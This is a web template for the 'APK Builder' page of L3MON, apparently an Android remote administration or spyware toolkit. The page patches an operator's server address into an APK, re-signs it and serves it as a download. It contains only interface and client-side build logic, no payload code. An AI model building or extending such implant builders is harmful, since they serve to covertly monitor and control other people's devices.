<!DOCTYPE html>
<html>

<% include partials/head.ejs %>


<body>
    <div class="ui container">
        <% include partials/header.ejs %>
        <div class="ui segment">

            <div id="dimmer" class="ui dimmer">
                <div class="ui indeterminate text loader" id="loadingText">Submitting</div>
            </div>

            <h1 class="ui" style="text-align: center">APK Builder</h1>
            <div class="ui form" id="form">
                <div class="inline fields">
                    <div class="two wide field">
                        <select class="ui dropdown" id="protocolSelect">
                            <option value="http" <%= !isHttps ? 'selected' : '' %>>http://</option>
                            <option value="https" <%= isHttps ? 'selected' : '' %>>https://</option>
                        </select>
                    </div>
                    <div class="six wide field">
                        <input type="text" id="uriInput" placeholder="IP / Public URL"
                            title="This is the public url of your server" value="<%= serverHost %>">
                    </div>
                    <div class="two wide field">
                        <label>:</label>
                        <input type="number" id="portInput" placeholder="PORT" min="0" max="65535"
                            title="Port number (leave 0 or empty for default 80/443)" value="<%= myPort %>">
                    </div>
                </div>
                <% if (isHttps) { %>
                <div class="ui info message">
                    <i class="info circle icon"></i>
                    <strong>Railway detected!</strong> Your server URL has been auto-configured with HTTPS. The APK will connect securely to this server.
                </div>
                <% } %>
                <div class="ui warning message" id="sslWarning" style="display: none;">
                    <i class="exclamation triangle icon"></i>
                    Using HTTPS requires a valid SSL certificate on your server.
                </div>
                <div class="inline fields">
                    <div class="eight wide field">
                        <button id="gobuild" class="positive ui fluid button"><i class="wrench icon"></i>Build APK</button>
                    </div>
                </div>
            </div>

            <div class="ui form" id="download" style="display: none">
                <div class="inline fields">
                    <div class="eight wide field">
                        <a class="blue ui fluid button" download="L3MON.apk" href="/build.apk"><i
                                class="download icon"></i>Download APK</a>
                    </div>
                    <div class="eight wide field">
                        <button id="buildAgain" class="ui fluid button"><i class="redo icon"></i>Build Another</button>
                    </div>
                </div>
            </div>

        </div>
    </div>
    <style>
        .inline.fields {
            justify-content: center;
        }
        #protocolSelect {
            min-width: 100px !important;
        }
    </style>

    <script>
        gtag('event', 'screen_view', {
            'screen_name': 'apkBuilder',
            'app_name': 'L3MON'
        });

        var loadingTexts = [
            "Decompiling APK",
            "Patching Server Information",
            "Compiling APK",
            "Signing APK",
            "Verifying Build",
            "Finalizing"
        ];

        var loadingIndex = 0;
        var isDone = false;
        var isDoneInterval;
        
        // Show SSL warning when https is selected (unless Railway)
        $('#protocolSelect').change(function() {
            <% if (!isHttps) { %>
            if ($(this).val() === 'https') {
                $('#sslWarning').show();
            } else {
                $('#sslWarning').hide();
            }
            <% } %>
        });
        
        // Build again button
        $('#buildAgain').click(function() {
            loadingIndex = 0;
            $('#download').fadeOut(200, function() {
                $('#form').fadeIn(200);
                $('#dimmer').removeClass('active').show();
            });
        });
        
        $('#gobuild').click((e) => {
            $('#dimmer').addClass('active');
            var useSSL = $('#protocolSelect').val() === 'https';
            build($('#uriInput').val(), $('#portInput').val(), useSSL);
            setTimeout(loaderText, 500);
        });

        function loaderText() {
            var nextTimeout = Math.floor(Math.random() * 1500) + 700;
            $('#loadingText').text(loadingTexts[loadingIndex]);
            loadingIndex++;
            if (loadingIndex !== loadingTexts.length) setTimeout(loaderText, nextTimeout);
            else isDoneInterval = setInterval(() => {
                if (isDone) {
                    clearInterval(isDoneInterval);
                    isDone = false;
                    $('#dimmer').fadeOut(500, () => {
                        $('#download').removeClass('active');
                    })
                    $('#form').fadeOut(500, () => {
                        $('#download').fadeIn(200);
                    })
                }
            }, 100);
        }

        function build(URI, PORT, useSSL) {
            var protocol = useSSL ? 'https' : 'http';
            gtag('event', 'build', {
                'builduri': protocol + '://' + URI + (PORT ? ':' + PORT : '')
            });
            $.post("/builder?uri=" + encodeURIComponent(URI) + "&port=" + PORT + "&ssl=" + useSSL, function (data) {
                if (!data.error) {
                    isDone = true
                } else {
                    $('#dimmer').removeClass('active');
                    loadingIndex = 0;
                    showNotification('#f03434', data.error);
                }
            }).fail(function() {
                $('#dimmer').removeClass('active');
                loadingIndex = 0;
                showNotification('#f03434', 'Server communication error');
            });
        }

    </script>
    <% include partials/footer.ejs %>
</body>

</html>